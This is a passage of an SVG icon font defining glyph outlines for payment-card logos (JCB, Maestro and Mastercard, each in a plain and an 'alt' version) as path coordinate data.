<glyph glyph-name="jcb-alt" horiz-adv-x="1000" unicode="&#xecd6;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-437-462c0-14-3-26-11-36-11-14-25-22-42-24-4 0-7 0-11 0h-34c-15 0-30 0-45 0-1 0-2 0-1 1v120c0 2 0 3 2 2 22-5 44-7 66-6 4 0 8 0 12 1 6 1 11 1 16 3 6 1 11 3 16 6 13 8 19 19 20 34 0 14 0 29 0 43v27c0 1 0 2-2 2-16-1-32-1-48-1v-67c0-4-1-7-2-11-2-6-7-11-13-15-7-4-15-4-24-3-15 1-29 6-42 12-1 0-2 1-2 2 0 48 0 96 0 144 1 23 12 40 32 52 8 3 15 6 24 6 1 0 2 0 4 0h83c2 0 2 0 2-2 0-97 0-194 0-290z m162 0c0-29-18-52-45-58-4-1-7-2-10-2-12 0-23 0-34 0-16 0-31 0-47 0-2 0-4 0-7 0-1 0-1 1-1 2v133c17-14 38-17 59-18 6 0 11-1 17 0 17 0 34 3 50 6 1 1 2 0 2 2 0 8 0 15 0 23-2 0-3-1-4-1-16-8-33-12-51-11-2 0-4 0-6 0-17 2-31 13-34 32-1 8 0 16 2 23 5 13 14 21 28 24 0 0 1 0 2 1 1 0 1 0 1 0h1c5 1 10 1 15 1 15-1 29-5 42-11 1-1 2-2 4-2v23c0 1 0 1-1 2-10 2-20 4-30 5-13 2-26 2-39 1-13-1-26-2-38-7-7-2-13-6-19-11 0 0-1 0-1 0v2c0 24 0 49 0 73 0 24 11 42 32 54 7 3 15 5 23 6 2 0 3 0 5 0 27 0 55 0 82 0 2 0 2-1 2-2 0-97 0-193 0-290z m163 0c0-15-5-28-15-40-11-13-26-20-43-20-29 0-57 0-85 0-2 0-2 1-2 2 0 39 0 77 0 116 0 1 0 2 2 2 31 0 61 0 92 0 10 0 20 3 27 11 11 12 9 29-4 39-6 4-13 6-21 7 0 0-1 0-1 0 0 0 0 0-1 1 3 0 4 1 6 1 10 3 17 9 20 19 4 12-2 24-14 30-7 4-15 4-23 4h-81c-2 0-2 1-2 3l0 58c0 28 18 50 44 57 5 2 11 2 16 2h82c2 0 3 0 3-2 0-97 0-194 0-290z m-115 109c6 0 12 0 17 0 6 0 11 0 17 0 7 0 13-6 14-14 1-7-3-14-11-16-1-1-3-1-5-1h-32c-1 0-2 0-2 2 1 9 1 18 0 27 1 2 1 2 2 2z m-1 19c0 8 0 17 0 25 0 1 0 2 1 2 11 0 21 0 32 0 7-1 12-7 13-14s-6-14-13-15c-6 0-11 0-16 0h-16c-1 0-1 1-1 2z" />
<glyph glyph-name="jcb" horiz-adv-x="1000" unicode="&#xecd7;" d="M995 725c-58 0-117 0-176 0-11 0-22-1-33-4-56-15-94-63-94-122-1-41 0-82-1-124 0-4 2-5 6-5 57 0 115 0 172 0 17 0 34-2 50-9 25-13 37-38 29-65-6-21-22-33-42-39-4-1-8-2-13-3 1-1 1-1 1-2 1 0 2 0 3 0 16-2 32-6 45-16 27-20 31-57 9-81-16-18-37-25-59-25-65 0-130 0-196 0-3 0-5-1-5-5 0-82 0-164 0-246 0-3 1-4 5-4 60 0 120-1 181 0 37 0 68 15 92 43 21 24 31 52 31 84 0 206 0 412 0 618 0 4-1 5-5 5z m-345 0c-59 0-118 0-177 0-3 0-6 0-9-1-18 0-34-4-49-12-46-25-69-63-69-115 0-52 0-104 0-155v-5c1 1 2 1 2 2 13 10 27 17 42 22 26 10 52 14 80 16 28 1 56 0 83-3 22-3 43-7 64-12 2 0 2-1 2-3v-50c-3 0-6 3-9 4-28 14-57 22-88 24-11 0-21 0-32-2l-2 0c-1 0-2 0-3-1-1 0-3 0-5-1-28-7-49-22-58-50-6-16-6-33-4-49 5-41 35-64 72-69 4-1 8-1 12-1 38-2 74 7 109 23 3 2 5 4 8 4 0-17 0-34 0-50 0-3-1-3-3-3-35-8-71-14-107-15-12 0-24 0-36 0-46 4-90 11-127 40v-283c0-1 0-1 0-2 0-2 0-3 3-3 5 0 10 0 15 0 33 0 66 0 99 0 24 0 49 0 73 0 7 0 14 1 21 3 59 14 97 64 97 125l0 617c0 4 0 5-4 5z m-346 0c-59 0-118 0-177 0-3 0-6 0-9-1-17 0-34-4-49-13-44-24-68-61-68-110-1-102-1-204-1-306 0-3 1-4 4-5 29-14 58-24 90-26 18-1 35-1 51 8 13 7 22 17 27 31 2 8 3 15 3 23 0 48 0 96 1 144-1 0-2 1-2 1 0 0 1-1 2-1 34 0 69 0 103 0 4 0 4-1 4-4l0-56c0-31 0-62-1-93-1-31-15-55-42-71-10-6-21-11-33-14-11-3-23-5-34-7l0-2 0 2c-9-1-18-2-27-2-48-1-95 3-141 14-4 1-5 1-5-4 0-84 0-169 0-253 0-1 0-2 0-3 0-2 1-2 3-2l96 0h74c7 0 15 0 22 0 37 4 66 21 89 50 17 23 24 48 24 77 0 206 0 412 0 618 0 4 0 5-4 5z m-131-252c0-1 1-1 1-1 0 0-1 0-1 1z m584-204c23 0 45 0 68 0 3 0 7 0 11 1 15 4 25 19 23 35-2 17-15 29-31 30-12 0-24 0-36 0v0c-11 0-23 0-35 0-3 0-4-1-4-4 0-19 0-39 0-58 0-4 1-4 4-4z m0 103c10 0 20 0 33 0 10 0 22-1 34 0 16 2 27 15 27 31 0 15-12 28-28 29-22 2-45 1-67 1-3 0-3-1-3-4 0-18 0-36 0-54 0-3 1-3 4-3z" />
<glyph glyph-name="maestro-alt" horiz-adv-x="1000" unicode="&#xecd8;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-111-526c-39-21-81-29-125-24-42 6-79 23-111 50-13-11-28-22-44-30-35-17-71-24-109-20-77 7-133 46-168 114-17 34-23 71-20 109 5 56 30 103 73 139 38 32 83 48 133 47 50 0 94-16 132-49 1 0 3-1 4-2l0 0 0 0c42 37 92 54 148 51 93-5 174-76 190-168 15-88-25-173-103-217z m-211 307c0 0-1 0-1 0-3 5-6 8-9 12-1 0-1 0-1 0h-22c-7 0-13-4-16-12h45c2 0 3 1 4 0z m13-24c1 0 2 0 3 0 0 0 0 0 0 0-2 4-5 8-7 11h-61c-8 0-11-3-13-11h3c25 0 50 0 75 0z m8-25c5 0 7 0 8-1l0 0c-1 4-3 8-6 13-29 0-58-1-88 0-6 0-10-2-12-8-1-4-1-4 3-4 31 0 63 0 95 0z m-217-15c-13 0-27 0-40 0-3 0-4-1-5-4-9-22-19-44-28-66 0-1 0-3-2-3-1 23-3 46-4 69 0 3-1 4-4 4-13 0-26 0-39 0-3 0-4-1-4-4-7-40-14-80-21-120-1-3 0-4 3-3 6 0 13 0 19 0 3-1 4 1 5 4 4 25 8 50 13 76 1 5 1 9 3 15 2-31 4-61 5-91 1-3 2-5 6-4 7 0 14 0 21 0 3-1 4 1 5 3 6 14 12 29 18 43l20 48c0 0 0 0 1 0l-4-23c-4-23-8-45-12-67-1-3 0-5 3-4 7 0 13 0 20 0 2 0 3 0 3 3 7 40 14 80 22 120 0 3 0 4-4 4z m93-45c-3 11-11 17-21 21-10 3-21 2-32 2-6 0-13-1-20-3-1-1-3-1-3-3-2-7-4-14-7-22 14 4 27 6 40 5 8 0 13-5 13-11 0-3-1-5-4-5-9 1-17 0-25-1-17-2-31-8-37-25-8-21 2-43 30-42 10 1 19 5 27 10 1 1 1 1 1 1 1 0 0-1 0-1 0-1 0-2 0-3-1-5 0-6 4-5 5 0 11 0 16 0 3-1 4 1 5 4l12 64c1 5 2 9 1 14z m-35-40c-2-14-7-19-21-21-4 0-9 0-11 4-2 4-1 11 2 14 4 5 9 7 14 8 4 1 7 1 11 2 7 0 7-1 5-7z m66-56c-2 0-3 0-5 0 0-2 2-4 2-5 1-6 5-7 10-7 25 1 50 0 75 0h13c0 0 0 0 0 0 2 4 4 9 6 13-2-1-4-1-7-1-31 0-63 0-94 0z m18-26h-11c2-2 3-4 4-6 2-4 5-5 10-5 17 0 33 0 49 0 4 0 8 1 10-1 0-1 0-1 0-1 3 5 6 10 9 15-1-2-3-2-6-2-22 0-44 0-65 0z m47-25c-11 1-23 0-34 0-3 0-5 1-7 0 7-10 8-11 19-11 3 0 7 0 11 0 2 0 4 1 6-1l0 0c4 4 9 9 13 14l-1 0c-1-1-4-2-7-2z m-69 68l2 0c3-1 6-2 9-3h0l2 0h1c8-2 19-3 29 0 2 0 3 1 5 2 0 0 0 0 0 0l1 0c0 0 1 0 2 1 2 0 3 1 4 2 0 1 1 2 1 2 0 1 1 3 1 4l1 10 1 2 0 2s0 2 1 4c-1-1-2-1-2-1-3-1-5-2-7-3-2-1-4-1-5-2l-3 0c-3-1-6-2-9-2l-3 0h-2l-3 0c-2 0-5 1-7 1-2 0-4 1-5 1-1 1-1 1-2 1-2 1-4 3-5 4-1 1-2 2-3 4l-1 0c0 1-1 2-1 3-1 1-1 1-1 2s-1 2-1 2c0 2 0 3 1 4s4 1 7 1h51l1 0c0 0 0 0 1 0 0 0 1 0 1 0 1 1 1 1 1 1 0 0 0 0 0 0l0 1 1 0 2 12c1 7 1 14-1 20 0 3-1 5-2 7 0 1-1 3-2 4s-2 3-3 4c-1 2-2 3-3 4s-3 1-4 2l-1 1c-2 1-3 1-4 2-2 1-4 1-6 2-1 0-2 1-3 1-5 0-9 0-14 0l-6 0c0 0-1 0-2 0-4-1-7-2-10-3-1 0-2-1-3-1l-4-2s-2-1-3-1l-2-2c-1-1-2-2-3-3-5-4-9-10-12-16-1-1-1-3-2-5l-1-2-1-3c0-2-1-4-1-5 0-3-1-6-1-9-2-19 3-35 20-46l1-1c1 0 1 0 1 0l1 0s0-1 0-1c0 0 1 0 1 0l1 0 0 0c0 0 1-1 1-1l0 0 1 0 0 0c1 0 1-1 1-1z m27 80c8-1 13-10 12-17-1-2-2-2-3-2h-15s-9 0-14 0c-2 0-3 0-3 3 2 11 12 18 23 16z m75 35c9 0 11 0 12-4h1c-2 6-4 12-6 18v0c0-2-1-3-4-3-35 1-70 0-105 0-7 0-7 0-9-7-2-4-1-4 3-4h108z m42-13c-4 0-9 1-14 1-4 0-9 0-14 0h0c-5 0-9-1-14-1-8-2-16-4-22-11-4-8-7-16-6-24 0-2 0-3 0-5 1-2 1-4 2-7 1-1 2-2 3-3 3-4 6-6 10-8l8-3s6-3 8-4c2-1 4-2 5-3s1-3 1-5c0-4-2-7-4-8-2-2-4-2-8-2-9-1-19 0-29 3-2 0-3 0-4 0 0 0 0 0-1-1l0 0c0 0 0 0 0-1-1 0-1-1-1-2l-2-10c0-4-1-6 0-7 1 0 1 0 1 0h0c0 0 0 0 0 0 0 0 0 0 0-1 1 0 1 0 1 0 0 0 0 0 0 0l1 0c0 0 0 0 0 0 0 0 0 0 1 0l0 0c0-1 0-1 1-1l0 0 1 0c2-1 5-1 8-2l4 0v0h1c6-1 13-1 13-1v1h4c1 0 2 0 3 0h1l3 0c0 0 0 0 1 0 1 0 2 0 3 0 5 1 12 3 16 5 15 7 18 20 17 35-1 13-10 18-21 21 0 1 0 1-1 1v0h0v0l-3 1c0 0-1 0-1 0-3 1-5 2-7 4-1 0-1 0-1 0-3 3-4 7-3 9 0 1 1 2 2 3 0 0 1 1 1 1 1 0 2 1 2 1l3 1 2 1s2 0 2 0c1 0 2 0 3 0v0 0c0 0 1 0 2 0 1 0 2 0 3 0 5 0 10 0 15-1 3-1 4 0 4 3 1 5 2 10 3 15 1 3 0 4-3 5z m43-23c4 0 8 0 11 0 3-1 3 0 4 2 1 6 2 11 3 17 0 2 0 3-3 3-3-1-7 0-11 0-2-1-3 0-2 3l3 16c1 3 0 5-4 4-3 0-6 0-9 0s-7 0-10 0c-3 1-4-1-5-3-2-13-4-25-6-38-4-23-8-46-11-69-2-9 2-13 11-16s17-2 26 0c8 1 9 2 10 11 1 2 1 4 1 7 1 2 1 4-3 3-4-2-8-1-12 0-4 1-5 3-5 6 3 17 6 34 9 51 0 2 1 3 3 3z m80-3c2 9 5 17 10 25-15 3-25-4-34-15 1 4 1 8 2 12 1 2 0 3-2 3-7 0-15 0-22 0-3 0-4-1-4-4 0-4-1-9-2-14-5-27-10-55-15-83 0-3 1-4 4-3 4 0 8 0 12 0 12 0 12 0 14 12 2 16 5 32 8 48 3 10 9 15 19 17 3 0 5 0 8 0 1 0 2 1 2 2z m84 17c-18 13-50 12-67-2-15-11-20-27-21-45-1-27 14-46 40-50 20-3 38 0 53 16 10 11 14 25 14 40 0 17-5 31-19 41z m-20-60c-3-4-6-8-12-9-12-4-21 2-22 15-1 11 1 21 7 30 3 5 8 8 13 9 13 3 20-5 20-21 0-8-2-16-6-24z" />
<glyph glyph-name="maestro" horiz-adv-x="1000" unicode="&#xecd9;" d="M995 405c-23 134-141 238-277 245-82 4-155-20-217-74 6-8 15-14 21-22-6 8-15 14-21 22-2 1-3 2-5 3-56 47-120 71-194 71-73 1-138-22-194-69-63-53-99-121-106-203-6-56 3-110 29-159 51-100 133-157 245-168 56-6 109 5 159 30 24 12 45 27 66 44 46-41 100-65 161-73 65-8 126 3 183 35 114 64 173 188 150 318z m-506 148c10 0 21 0 31 0 1 0 1 0 1 0 5-5 10-11 15-17 1 0 1 0 2-1 4-6 9-11 12-18-3 7-8 12-12 18-2 2-4 1-6 1h-67c5 12 13 17 24 17z m-28-36h88c4-5 8-11 11-16 1 0 2-1 2-2 3-6 7-11 9-18-2 7-6 12-9 18-1 3-4 2-7 2-36 0-72 0-109 0h-5c3 12 8 16 20 16z m-37-47c3 9 9 11 18 11 43 0 86 0 129 0 3-6 6-13 9-19 1-2 2-4 4-9 0-1 1-2 1-3 0 0-1 2-1 3-4 11-4 12-17 12-46 0-93 0-139-1-5 0-6 1-4 6z m-20-77c0 0 0 1-1 1 1 0 1 0 1-1z m2 0c0 0 0 0-1 0 1 0 1 0 1 0z m-3 2c0 0 0 1 0 1 0 0 0-1 0-1z m-184-139c-10 0-19 0-29 0-5 0-6 1-5 6 6 32 12 65 18 98 2 11 4 23 5 34l-1 0-29-71c-8-21-17-41-25-62-2-4-4-6-9-5-10 0-20 0-31 0-5-1-7 1-7 7-2 43-5 87-8 132-3-8-3-15-4-22-7-37-14-74-20-111-1-5-2-6-7-6-9 0-18 0-28 0-4 0-5 0-4 5 10 58 20 117 30 176 1 4 3 6 7 6 19-1 37-1 56 0 5 0 6-2 6-7 2-33 4-67 6-100 3 0 3 2 4 4 13 32 26 64 40 97 1 4 3 6 8 6 19-1 39-1 58 0 5 0 6-2 5-7-10-58-20-117-31-176 0-3-2-4-5-4z m140 0c-7 0-15 0-22 0-6-1-8 1-7 7 0 2 0 3 0 5 1 0 1 1 1 1-1 0-1 0-1 0-13-9-26-14-41-15-40-3-55 30-44 60 10 25 30 35 55 37 12 1 24 2 36 2 5-1 6 2 6 7 1 9-7 16-19 17-19 0-38-2-58-8 3 12 6 22 10 32 0 3 3 3 5 4 9 4 19 4 29 5 16 0 31 2 47-4 14-5 26-13 30-30 2-6 0-13-1-20-6-31-12-63-18-94-1-5-3-7-8-6z m68-28c-1 3-3 4-3 7 2 2 5 1 7 1 46 0 92 0 138 0 4 0 8 0 10 2-3-7-5-13-8-19l0 0h-20c-36 0-73 0-109 0-8 0-13 1-15 9z m90 94c0 1 0 1 0 1 0 0 0 0 0-1z m0 1l1 1c-1 0-1-1-1-1z m-70-133c-1 2-3 5-5 8h15c32 0 63 0 95 0 4 0 7 1 10 3-5-8-9-15-14-23 0 1 0 2 0 2-3 4-9 1-14 1-24 1-48 1-72 0-7 0-12 2-15 9z m55-63c6 6 12 10 17 17-3 3-6 1-9 1-5 1-11 1-16 1-16 0-18 0-27 15 3 2 6 1 9 1 17 0 34 0 51 0 6 0 11 1 14 7 1 1 2 3 3 4-12-16-26-32-42-46z m128 249c-8 2-15 2-22 2l-4 0-4 0v-1c1-7 1-14 1-21v0c0 7-1 15-1 22-1 0-2 0-3 0-1 0-2 0-4 0-1-1-2-1-3-1s-2-1-3-2c-2 0-3-1-4-2 0 0-1 0-1-1-1-1-2-2-3-4-2-4-1-9 4-13 0 0 1 0 1-1 4-2 7-4 11-5 0 0 1 0 2-1l4-1c0 2 0 5 0 7v-7c1 0 1 0 2 0 16-5 29-13 30-32 2-22-4-40-24-51-7-4-16-6-24-7-2 0-3-1-5-1l-2 0c-1 0-2 0-4 0 0 0-1 0-1 0l-4 0h-7l0 0s-9 0-19 1h0v0l-6 0c-4 1-9 1-12 2 0 1-1 1-2 1 0 0 0 0 0 0l-1 0-1 0-1 1 0 0c0 0 0 0-1 0l0 0c0 0 0 0-1 0l0 0c0 1 0 1 0 1 0 0-1 0-1 0 0 0 0 0 0 0-2 2-1 5 0 10l3 15c0 1 0 3 0 4l1 1 0 0c1 1 1 1 1 1 2 1 4 0 7 0 13-4 28-6 42-5 5 0 8 1 11 3 4 3 5 7 6 12 1 4 0 6-2 8-1 2-4 3-6 4-4 2-8 3-12 5l-12 5c-6 3-11 6-15 11-1 2-3 3-4 5-1 4-2 7-3 11 0 2 0 4-1 6 0 12 3 24 10 35 8 10 20 14 32 17l-96 0c1 0 3-1 4-1 3-1 6-2 9-3 2-1 4-2 6-3 0 0 1-1 2-1 2-1 3-3 5-4 2-1 4-3 5-5 2-2 3-4 4-6 1-2 2-4 3-6 1-3 2-6 3-10 2-9 2-20 1-30l-3-16c0-1 0-1 0-1l-1-1c0 0 0 0 0-1-1 0-1 0-1 0 0 0 0 0 1 0-1 0-1 0-1 0-1-1-2-1-2-1-1 0-1 0-1 1-1 0-2 0-2 0h-1c-12 0-24 0-36 0h-37c-5 0-8-1-10-2-2-1-2-3-2-6 1-1 1-2 1-3 1-1 1-2 2-4 1-1 1-2 2-3l1-1c1-2 2-4 4-5 2-3 5-4 8-6 1 0 2-1 3-1 2-1 4-2 6-2 4 0 8-1 11-1l4 0c1 0 3 0 4 0 1 0 2 0 3 0 5 0 10 0 15 1l3 1c3 1 5 2 7 3 4 1 7 3 10 5 1 0 2 0 3 0 0-2 0-4 0-5 0-1-1-2-1-3l0-3-3-14c0-2 0-4-1-6 0-1-1-2-1-3-2-1-3-3-6-4-1 0-2-1-4-1l0 0c0 0-1 0-1 0-2-1-5-2-7-2-15-4-31-3-43-1h-1l-3 1h0c-4 1-9 2-13 4l-2 0c0 0 0 0 0 0l-2 1 0 0c-1 0-1 1-2 1l0 0-2 0 0 1-1 0c-1 0-1 0-1 1s-1 0-1 0l-1 1-1 0c-1 0-1 1-2 1h0c-25 16-32 40-29 67 0 5 1 9 1 13 1 2 1 5 2 7 0 2 1 3 1 5 1 1 1 2 2 4 1 2 2 5 3 7 4 9 10 17 17 24 0 0-1 0-2 0 1 0 1 0 2 0 1 1 3 2 4 3s3 2 4 3c2 0 3 1 5 2 1 1 3 2 4 2s3 2 5 2c4 2 9 3 14 4l4 1c3 0 6 0 8 0 7 0 14 0 20-1l97 0 20 2c-3 17-3 17-20 17-53 0-106 1-159 0-5 0-6 1-5 6 4 11 3 11 15 11 51 0 102 0 152 0 6 0 7 1 7 4 0 0 0 0 0-1 3-9 6-18 8-27 0-1 0-1 0-1 1-3 2-6 2-9 7 0 14 0 21 0 7-1 13-1 20-2 5-1 6-2 5-6-2-8-4-15-5-23-1-4-2-6-6-5z m-223 17l1 1c0 0-1-1-1-1z m308-17l-16 0c-3 0-5-1-5-5-4-24-8-49-13-73 0-6 2-9 7-10 6-2 12-2 18 0 5 2 5 0 5-4-1-4-2-7-2-11-1-12-2-13-14-15-13-3-27-3-39 0-13 4-18 10-16 23 5 34 11 68 16 101 3 18 7 37 10 55 0 4 2 6 6 6 5-1 10-1 14-1s10 0 15 1c6 0 6-2 5-7-2-8-3-16-4-24-1-4 0-4 3-4l16 0c3 0 4-1 4-5-2-8-3-15-5-23 0-3-1-5-5-4z m59-32c-5-23-9-47-13-70-3-18-2-18-20-18-6 0-12 0-18 0-4 0-6 0-5 5 7 41 14 81 21 121 2 7 3 14 4 21 0 4 2 5 6 5 10 0 21 0 31 0 4 0 5-1 4-5l-3-17c12 17 28 26 50 23-8-12-12-24-15-37 0-2-1-2-3-2-4-1-8-1-12-1-15-3-24-10-27-25z m172-66c-22-23-49-28-78-23-38 6-60 34-58 73 1 26 8 49 30 66 26 20 72 22 99 3 20-15 27-36 27-61 0-21-5-41-20-58z m-330 133c-7 0-14 1-21 1 7 0 14-1 21-1z m-289-83c-5-1-10-2-15-3-8-2-16-5-21-11-5-6-6-15-3-21 3-6 10-6 16-6 20 2 28 10 31 31 2 9 2 9-8 10z m138 50c-16 3-31-7-33-24-1-3 0-4 3-4 7 0 14 0 21 0h22c2 0 3 0 4 3 2 11-6 23-17 25z m-42-29c-4-1-3-5-4-8-1-4-2-8-3-13-1-3 0-4 4-4 4 0 6 0 7 5 0 4 1 8 2 12 0 2 2 5 0 7-1 2-4 1-6 1z m466 26c-8-1-15-6-19-13-10-13-11-28-10-44 1-19 14-28 32-23 8 2 13 8 17 14 6 12 9 24 9 35 1 24-10 35-29 31z" />
<glyph glyph-name="mastercard-alt" horiz-adv-x="1000" unicode="&#xecda;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-123-445c-62-64-157-62-215-13 21 20 37 44 45 73-4 0-7 0-11 0-1 0-2-1-2-2-7-18-15-34-27-48-4-5-9-10-14-16-9 9-17 18-23 28-7 11-12 23-17 34-1 3-2 4-6 4-2 0-5 0-8 0 8-29 23-53 44-73-56-48-148-51-209 9-64 61-65 161-4 224 61 62 154 61 213 12-21-21-36-45-44-73 4 0 7-1 11 0 1 0 2 1 2 3 7 19 17 36 31 51 3 4 6 7 10 11 10-9 18-19 25-31 6-10 10-21 15-31 1-2 2-4 5-3 3 0 6 0 9 0-8 28-24 52-45 73 52 45 143 53 207-6 66-60 69-162 8-226z m-412 143c-3 0-5-1-6-4-5-11-10-23-16-34 0-1 0-2-1-4-1 15-2 28-3 42h-26c-5-24-9-47-14-71h16c3 16 6 32 9 48 1 0 1 0 1 0 1-16 3-32 4-48 5 0 8 0 12 0 3 0 4 1 5 3 5 12 11 25 16 37 1 2 2 3 3 5-1-7-2-15-4-22-1-8-2-15-4-23h17c4 24 9 47 13 71l-22 0z m71-35c0 13-4 21-15 22-9 1-18 0-28 0-1 0-2-2-2-3-1-3-1-7-2-10 8 0 15 1 22 1 2 0 4 0 6-1 1-1 1-3 2-5 0-1-3-2-4-2-3 0-6 0-9 0-13-1-22-8-24-19-3-9 3-18 12-19 6 0 12 1 18 2 5-4 11-1 16-2 3 12 5 23 7 34 0 1 1 2 1 2z m-33-23c-5 0-7 4-4 9 3 5 10 6 17 4 0-11-7-14-13-13z m60 24c-2 1-5 2-5 6 1 4 5 3 7 3 4 0 8 0 13 0 1 3 2 7 3 11-9 3-18 3-26 1-11-3-16-9-15-20 0-5 2-8 6-10 4-2 8-4 12-6 2-1 4-3 3-6 0-3-3-3-5-3-7 0-13 0-20 1-1-4-2-8-2-12 10-2 19-3 29-1 3 1 6 2 9 4 9 7 8 21-1 27-3 2-5 3-8 5z m50 17c0 1 0 2 1 4-3 0-6 0-9 0 1 6 2 10 3 16h-6c-9 0-10 0-11-10-4-16-7-32-10-48-1-7 2-14 9-15 4-1 9 0 13 1 1 0 3 1 3 2 1 4 1 7 1 10-2 0-3 0-5 0-2 1-5 2-4 5 1 9 3 17 5 26 8 1 8 1 10 9z m23-40c-7 0-11 6-9 12h36c0 6 0 11-1 16 0 6-3 12-9 14-10 5-20 5-30-1-9-7-15-22-13-34 2-10 7-17 17-20 9-2 18-1 27 1 1 0 3 1 3 2 1 4 2 7 2 11-1 0-1 0-2 0-7-1-14-1-21-1z m6 34c4-1 6-4 5-11h-19c2 8 7 12 14 11z m45 5c1 6-3 5-7 5-2 0-3 1-5 0-1 0-3-1-3-2-3-19-7-37-10-56h6c10 0 10 0 12 10 0 0 0 1 0 1 2 8 3 16 6 23 1 5 5 9 11 9 1 0 2 1 2 2 1 4 3 8 4 13-6 1-11-1-16-5z m61 2c1 0 2 0 3 1 3 2 6 5 9 8-1 1-1 2-1 2-9 9-24 11-37 4-17-9-22-24-22-42 1-11 6-20 16-25 10-5 21-3 32 1-2 5-3 9-5 14-1 0-3 0-4-1-9-2-18 2-20 9-3 10-1 18 6 25 6 7 14 8 23 4z m40 4c-8 0-17-1-25-1-1 0-2-2-2-2-1-4-2-8-2-12 1 1 2 1 3 1 7 0 14 1 21 1 5 0 6-3 4-8-3 0-7 0-11 0-13 0-22-7-25-18-2-10 3-19 13-20 6 0 12 1 18 2 4-4 10-1 16-2 3 13 6 25 7 38 1 13-4 19-17 21z m-15-46c-2 0-5 1-5 3-1 1 0 4 1 6 3 5 10 7 16 4 0-11-6-14-12-13z m73 46c-6 0-11-2-15-5-1 2-2 4-3 5-5 0-9 0-13 0l-11-59c5 0 10 0 14 0 1 0 2 2 3 3 0 3 1 6 1 9 2 8 4 15 6 23 2 5 5 8 11 9 1 0 2 1 3 1 1 5 2 9 4 14z m-4-30c-1-7-1-13 3-20 6-8 13-11 22-7 2 0 4 1 6 2 1-1 2-4 4-4 5 0 10 0 16 0l13 74h-17c-1-7-2-14-4-21-3 2-5 5-8 5-8 2-19 2-26-7-5-6-8-14-9-22z m25 15c7 4 12 1 13-7 0-1 0-2 0-2 1-7-2-12-6-16-6-5-14-3-15 5-2 6 2 16 8 20z" />
<glyph glyph-name="mastercard" horiz-adv-x="1000" unicode="&#xecdb;" d="M904 568c-119 110-290 95-386 11 39-38 67-83 84-137-7 0-13 0-18 0-5 0-7 2-9 6-9 20-17 40-28 59-12 21-28 40-47 57-7-6-13-13-19-20-25-28-44-60-56-96-1-2-3-5-5-6-7 0-14 0-21 0 16 53 44 98 83 137-110 92-285 93-398-23-114-117-112-304 6-419 115-111 286-105 391-16-38 39-66 84-82 137 6 0 11 0 16 0 6 1 8-2 10-7 10-21 20-43 32-64 11-19 26-36 43-52 9 10 18 19 26 29 22 27 39 56 50 89 1 2 3 5 5 5 6 0 13 0 21 0-17-54-45-99-84-137 106-91 285-95 400 25 114 119 109 309-14 422z m-770-287c3 14 6 28 8 42 3 14 5 27 7 42-2-3-4-7-5-10-11-23-21-46-31-69-2-4-4-6-8-5-7 0-15 0-23 0-3 30-5 59-8 89l-1 0c-5-29-11-59-17-89h-30c8 44 17 87 25 131h48c2-25 4-50 6-77 2 3 3 4 3 6 10 22 20 43 30 65 2 5 4 7 10 7 14-1 27 0 42 0-8-45-16-88-25-132-10 0-20 0-31 0z m103 2c-12-1-23-3-34-2-17 2-27 18-23 35 5 21 21 34 46 35 5 1 11 0 16 1 3 0 7 2 7 3-1 3-2 7-4 9-2 2-6 2-10 2-13 0-27-1-41-2 1 7 2 13 3 19 1 2 3 5 5 5 17 1 34 3 52 1 20-2 28-17 27-41 0-1-1-3-1-5-4-20-8-41-13-63-10 3-22-4-30 3z m111 7c-4-4-10-7-16-8-18-3-36-2-55 2 2 8 3 15 4 21 13 0 25 0 38-1 4 0 9 1 10 7 1 5-2 8-6 11-8 3-15 7-22 11-7 3-11 10-12 18-1 21 7 33 28 38 16 4 32 4 48-2-2-8-4-15-6-21-8 0-15 0-23 0-5 0-11 1-13-6-1-6 4-9 9-11 5-3 10-5 14-8 19-12 20-38 2-51z m57 17c3 0 5 0 9 0-1-6-1-12-2-19-1-2-3-5-5-5-8-1-17-3-25-2-12 2-20 15-17 30 6 30 12 60 18 90 3 17 4 17 21 17h12c-2-10-3-19-5-28 5-1 10-1 15-1 0-3-1-6-1-9-4-14-4-14-19-16-3-15-6-31-9-47-1-6 3-9 8-10z m103-19c-1-2-3-4-5-4-17-4-35-6-52-1-18 5-28 18-31 37-4 22 7 51 25 62 17 11 36 11 55 4 12-5 17-16 18-28 0-9 0-18 0-29h-66c-5-12 3-23 17-23 13 0 26 1 39 1 1 0 2 1 4 1-2-7-3-14-4-20z m74 72c-11 0-18-6-21-16-5-14-7-28-11-42l0-4c-4-17-4-17-21-17h-13c7 35 13 69 19 103 1 2 4 4 6 5 3 1 6 0 9 0 7 0 15 3 14-10 9 7 18 11 29 10-2-9-4-17-7-25 0-2-2-4-4-4z m41-31c4-14 20-21 38-17 2 1 5 1 8 2 3-9 5-17 9-27-21-8-41-10-61-1-19 9-28 26-29 46-1 34 10 62 41 80 23 13 53 9 69-8 0-1 1-2 2-4-5-5-11-11-17-16-2-1-4-1-6 0-16 6-31 4-43-8-13-13-16-29-11-47z m117-46c-11-1-22-3-32-2-19 2-29 18-24 36 5 21 22 33 46 34 7 1 14 1 21 1 3 9 0 14-8 14-13 0-26-1-39-2-2 0-4 0-7-1 2 8 3 15 4 21 0 2 3 4 4 4 16 1 32 3 47 2 24-2 35-15 32-39-2-23-8-47-13-71-11 3-22-3-31 3z m87 62c-4-14-7-28-10-42-2-6-2-12-4-18 0-2-3-4-5-4-8-1-16 0-26 0 7 36 14 72 21 109 7 0 16 0 23-1 3 0 4-5 6-8 8 6 17 10 28 8-3-8-5-16-7-25-1-1-3-2-4-2-12-1-19-8-22-17z m91-64c-3 0-5 4-8 7-3-1-7-3-10-5-18-6-31-1-41 15-7 11-9 24-7 37 2 15 8 29 17 41 13 16 34 17 50 13 5-1 10-6 15-10 3 14 5 27 8 40h31c-8-46-17-92-25-138-10 0-20-1-30 0z m-18 81c-11-8-18-25-16-37 4-14 18-19 29-9 8 7 12 17 12 30 0 0 0 2 0 4-2 14-13 19-25 12z m-688-41c-5-9-2-16 9-17 11-1 22 5 22 25-13 4-25 1-31-8z m504 0c-2-3-3-9-1-12 1-2 6-4 9-5 12-1 22 4 23 25-11 5-25 2-31-8z m-227 28c2 13-1 19-10 20-13 2-23-5-26-20h36z" />
